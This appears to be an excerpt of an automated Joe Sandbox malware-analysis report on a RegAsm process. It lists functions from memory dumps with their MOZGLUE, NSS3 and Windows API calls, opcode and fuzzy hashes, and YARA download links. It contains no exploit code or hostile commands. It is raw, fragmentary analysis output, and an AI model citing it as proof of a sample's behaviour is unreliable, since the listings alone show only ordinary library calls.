Part of subcall function 6CD307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CCC204A), ref: 6CD307E4
Part of subcall function 6CD307A0: TlsSetValue.KERNEL32(00000000,?,6CCC204A), ref: 6CD30864
Part of subcall function 6CD307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CD30880
Part of subcall function 6CD307A0: TlsSetValue.KERNEL32(00000000,?,?,6CCC204A), ref: 6CD308CB
Part of subcall function 6CD307A0: TlsGetValue.KERNEL32(?,?,6CCC204A), ref: 6CD308D7
Part of subcall function 6CD307A0: TlsGetValue.KERNEL32(?,?,6CCC204A), ref: 6CD308FB

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID:
API String ID: 326028414-0
Opcode ID: 782a6f1fcd609485e732af8745a971297210ee2649243e318e14b5073698d8e6
Instruction ID: 5c1ff7a1495e5d630ff73d2c1bcea4428cd67d61d20743c7914a5ec962cebe80
Opcode Fuzzy Hash: 782a6f1fcd609485e732af8745a971297210ee2649243e318e14b5073698d8e6
Instruction Fuzzy Hash: 32415DB4A00605DFCB00EF79C0948AABBF0FF49354B018569EC899B721EB30E855CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CC3B540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6CC3B5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6CC3B5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6CC3B5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6CC3B5F4
__Init_thread_footer.LIBCMT ref: 6CC3B605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6CC3B61F
std::_Facet_Register.LIBCPMT ref: 6CC3B631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC3B655

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: dad741efccb402d4b933ec3c532896e253fb4471cc1ea85dbbac576c1875d8b2
Instruction ID: 60fb51a38362d4a9e6cc97aa743c95619a45a5c5eccb414cd9feb7b4aef1a255
Opcode Fuzzy Hash: dad741efccb402d4b933ec3c532896e253fb4471cc1ea85dbbac576c1875d8b2
Instruction Fuzzy Hash: 3031E771B00514CFCF00EF69C8649AEB7B5FF89328F1485A9D91697740EB30A806CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6CBDB790 Relevance: 10.6, APIs: 7, Instructions: 147COMMON

Download Yara Rule

APIs

?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6CC1CC83,?,?,?,?,?,?,?,?,?,6CC1BCAE,?,?,6CC0DC2C), ref: 6CBDB7E6
?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6CC1CC83,?,?,?,?,?,?,?,?,?,6CC1BCAE,?,?,6CC0DC2C), ref: 6CBDB80C
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6CC1CC83,?,?,?,?,?,?,?,?,?,6CC1BCAE), ref: 6CBDB88E
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6CC1CC83,?,?,?,?,?,?,?,?,?,6CC1BCAE,?,?,6CC0DC2C), ref: 6CBDB896

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
String ID:
API String ID: 922945588-0
Opcode ID: 05f1f78867c54e88a7c3c2b451e4dd02776070562e40af671ac468b9ea750631
Instruction ID: 8b9ff1e3e5b4228995ab33e0735848b8c436a890fc314e212f9a21f09bdc48f7
Opcode Fuzzy Hash: 05f1f78867c54e88a7c3c2b451e4dd02776070562e40af671ac468b9ea750631
Instruction Fuzzy Hash: 61518A357006808FCB24DF59C494A2ABBF5FF89319B6A859DE98A97341C731FC02CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6CD8AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CD8AB3E,?,?,?), ref: 6CD8AC35

Part of subcall function 6CD6CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CD6CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CD8AB3E,?,?,?), ref: 6CD8AC55

Part of subcall function 6CDA10C0: TlsGetValue.KERNEL32(?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA10F3
Part of subcall function 6CDA10C0: EnterCriticalSection.KERNEL32(?,?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA110C
Part of subcall function 6CDA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA1141
Part of subcall function 6CDA10C0: PR_Unlock.NSS3(?,?,?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA1182
Part of subcall function 6CDA10C0: TlsGetValue.KERNEL32(?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CD8AB3E,?,?), ref: 6CD8AC70

Part of subcall function 6CD6E300: TlsGetValue.KERNEL32 ref: 6CD6E33C
Part of subcall function 6CD6E300: EnterCriticalSection.KERNEL32(?), ref: 6CD6E350
Part of subcall function 6CD6E300: PR_Unlock.NSS3(?), ref: 6CD6E5BC
Part of subcall function 6CD6E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CD6E5CA
Part of subcall function 6CD6E300: TlsGetValue.KERNEL32 ref: 6CD6E5F2
Part of subcall function 6CD6E300: EnterCriticalSection.KERNEL32(?), ref: 6CD6E606
Part of subcall function 6CD6E300: PORT_Alloc_Util.NSS3(?), ref: 6CD6E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CD8AC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CD8AB3E), ref: 6CD8ACD7
PORT_Alloc_Util.NSS3(?), ref: 6CD8AD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CD8AD2B

Part of subcall function 6CD6F360: TlsGetValue.KERNEL32(00000000,?,6CD8A904,?), ref: 6CD6F38B
Part of subcall function 6CD6F360: EnterCriticalSection.KERNEL32(?,?,?,6CD8A904,?), ref: 6CD6F3A0
Part of subcall function 6CD6F360: PR_Unlock.NSS3(?,?,?,?,6CD8A904,?), ref: 6CD6F3D3

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: bd79928fd5d0d95d5d675ce591eaf1051d9ee2080137cee6056f7112bcb7a55a
Instruction ID: dcc08f52665dd9695bebf64c5a61e3641d8f4759756f424eea57e851a19e4013
Opcode Fuzzy Hash: bd79928fd5d0d95d5d675ce591eaf1051d9ee2080137cee6056f7112bcb7a55a
Instruction Fuzzy Hash: C73139B5E016059FEB008F6ACC409AF7776EFC4328B198128E8199BB90EB31DC15C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 6CC11D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CC11D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6CC11BE3,?,?,6CC11D96,00000000), ref: 6CC11D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6CC11BE3,?,?,6CC11D96,00000000), ref: 6CC11D4C
GetCurrentThreadId.KERNEL32 ref: 6CC11DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC11DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC11DDA

Part of subcall function 6CC11EF0: GetCurrentThreadId.KERNEL32 ref: 6CC11F03
Part of subcall function 6CC11EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6CC11DF2,00000000,00000000), ref: 6CC11F0C
Part of subcall function 6CC11EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6CC11F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6CC11DF4

Part of subcall function 6CBDCA10: malloc.MOZGLUE(?), ref: 6CBDCA26

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: c0720c8e7d4a4808e02d0930c9a64880a2e9e5c3fdb8d2998ed3506b9d809cf3
Instruction ID: 822fda1086bc3dbcc57c4f21c32ac405d9fdbfe89ad4707866d8a5d465cbfb98
Opcode Fuzzy Hash: c0720c8e7d4a4808e02d0930c9a64880a2e9e5c3fdb8d2998ed3506b9d809cf3
Instruction Fuzzy Hash: 304168B52007049FCB10EF29C498A5ABBF9FB89318F10846DE95A87B41DB75E854CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CD68C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6CD68C7C

Part of subcall function 6CE09DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CE50A27), ref: 6CE09DC6
Part of subcall function 6CE09DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CE50A27), ref: 6CE09DD1
Part of subcall function 6CE09DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CE09DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CD68CB0
TlsGetValue.KERNEL32 ref: 6CD68CD1
EnterCriticalSection.KERNEL32(?), ref: 6CD68CE5
PR_Unlock.NSS3(?), ref: 6CD68D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CD68D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CD68D93

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: e8c1e85eb30822028d8f60c1de5c59ee17bada7b91f179e95a4a57d36493d656
Instruction ID: ebb6f64365ec0671f1268cf9db92219bfb6a12f0a2b781d73098dd700801dbb6
Opcode Fuzzy Hash: e8c1e85eb30822028d8f60c1de5c59ee17bada7b91f179e95a4a57d36493d656
Instruction Fuzzy Hash: EC314871A00601EFDB00AF6ADC4479A7770BF56318F14013AEA1967F60D770A924CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CD62E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6CD5E728,?,00000038,?,?,00000000), ref: 6CD62E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CD62E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CD62E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6CD62E8F
PL_HashTableLookup.NSS3(?,?), ref: 6CD62E9E
PR_Unlock.NSS3(?), ref: 6CD62EAB
PR_Unlock.NSS3(?), ref: 6CD62F0D

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 92de8934ddfeacc67737cf97deb4762941f2c0394ea28e3c5e3339aa86597199
Instruction ID: 8f91a165ccc1595585a395b85de6fe280d1942e96bd0872176e29257259a7258
Opcode Fuzzy Hash: 92de8934ddfeacc67737cf97deb4762941f2c0394ea28e3c5e3339aa86597199
Instruction Fuzzy Hash: D331C4B6A00505ABEB006F69DC4487ABB75EF4525CF448175EC0887B32EB31ED64C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6CBD38A0 Relevance: 10.6, APIs: 7, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6CC4E220,?,?,?,?,6CBD3899,?), ref: 6CBD38B2
ReleaseSRWLockExclusive.KERNEL32(6CC4E220,?,?,?,6CBD3899,?), ref: 6CBD38C3
free.MOZGLUE(00000000,?,?,?,6CBD3899,?), ref: 6CBD38F1
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CBD3920
RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6CBD3899,?), ref: 6CBD392F
RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6CBD3899,?), ref: 6CBD3943
RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6CBD396E

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID:
API String ID: 3047341122-0
Opcode ID: d3044f3bba099f4e2537162b41e1fc83849b6780d97eeed399783292a4ab68b0
Instruction ID: d2d3b900c6e10ee5d7b10a52884f6fe3a1f849f8af5d4948217d60a90da85422
Opcode Fuzzy Hash: d3044f3bba099f4e2537162b41e1fc83849b6780d97eeed399783292a4ab68b0
Instruction Fuzzy Hash: 7E214473600BA0DFD720DF25C880B8AB7B8EF44328F128429E95A97B01D735F885CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CDACEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6CDACD93,?), ref: 6CDACEEE

Part of subcall function 6CDA14C0: TlsGetValue.KERNEL32 ref: 6CDA14E0
Part of subcall function 6CDA14C0: EnterCriticalSection.KERNEL32 ref: 6CDA14F5
Part of subcall function 6CDA14C0: PR_Unlock.NSS3 ref: 6CDA150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CDACD93,?), ref: 6CDACEFC

Part of subcall function 6CDA10C0: TlsGetValue.KERNEL32(?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA10F3
Part of subcall function 6CDA10C0: EnterCriticalSection.KERNEL32(?,?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA110C
Part of subcall function 6CDA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA1141
Part of subcall function 6CDA10C0: PR_Unlock.NSS3(?,?,?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA1182
Part of subcall function 6CDA10C0: TlsGetValue.KERNEL32(?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CDACD93,?), ref: 6CDACF0B

Part of subcall function 6CDA0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CDA08B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CDACD93,?), ref: 6CDACF1D

Part of subcall function 6CD9FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CD98D2D,?,00000000,?), ref: 6CD9FB85
Part of subcall function 6CD9FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CD9FBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CDACD93,?), ref: 6CDACF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CDACD93,?), ref: 6CDACF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6CDACD93,?,?,?,?,?,?,?,?,?,?,?,6CDACD93,?), ref: 6CDACF78

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: f3a0392324b365ba86afccd1f0d7c62c4b8f42bc251e78783c77bf2c51083ad7
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: 7911D2A5A012009BEB00ABEAEC41B7BB5EC9F8815DF044039EC09D7761FB61D90986B2

Uniqueness

Uniqueness Score: -1.00%

Function 6CC084E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC084F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC0850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC0851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC0855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC0856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC085AC

Part of subcall function 6CC07670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CC085B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC0767F
Part of subcall function 6CC07670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CC085B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC07693
Part of subcall function 6CC07670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CC085B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC076A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC085B2

Part of subcall function 6CBE5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CBE5EDB
Part of subcall function 6CBE5E90: memset.VCRUNTIME140(6CC27765,000000E5,55CCCCCC), ref: 6CBE5F27
Part of subcall function 6CBE5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CBE5FB2

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: 7b46634786c1a08252ab34a94179dcf3c574049ddd7d6857bdd335d66a1477c3
Instruction ID: a889325b2c8426e820fb6514a3a8cbb42ed767cbed220e6ee6e2e2b10ec4d910
Opcode Fuzzy Hash: 7b46634786c1a08252ab34a94179dcf3c574049ddd7d6857bdd335d66a1477c3
Instruction Fuzzy Hash: 59217F743006019FEB14DB25C888E5AB7B5AF8430DF14882DE95BC3B41EB36F959CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6CBD1640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000114), ref: 6CBD1699
VerSetConditionMask.NTDLL ref: 6CBD16CB
VerSetConditionMask.NTDLL ref: 6CBD16D7
VerSetConditionMask.NTDLL ref: 6CBD16DE
VerSetConditionMask.NTDLL ref: 6CBD16E5
VerSetConditionMask.NTDLL ref: 6CBD16EC
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CBD16F9

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemset
String ID:
API String ID: 375572348-0
Opcode ID: 1aa749f52d88a84a84a5e415f870a3158125e5a4ccb07fef5dd9cd63ed44ec5e
Instruction ID: 1d0e443ad8f536e43ce000622a92f17f9a97b6caaa31e1a083ef1b62b45f40fb
Opcode Fuzzy Hash: 1aa749f52d88a84a84a5e415f870a3158125e5a4ccb07fef5dd9cd63ed44ec5e
Instruction Fuzzy Hash: 9521D2B07402486FEB10AB649C85FBBB37CEF86718F058528F6059B6C1D678AD54C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6CD58C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CD58C1B
EnterCriticalSection.KERNEL32 ref: 6CD58C34
PL_ArenaAllocate.NSS3 ref: 6CD58C65
PR_Unlock.NSS3 ref: 6CD58C9C
PR_Unlock.NSS3 ref: 6CD58CB6

Part of subcall function 6CDEDD70: TlsGetValue.KERNEL32 ref: 6CDEDD8C
Part of subcall function 6CDEDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CDEDDB4

Strings

KRAM, xrefs: 6CD58C8F

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
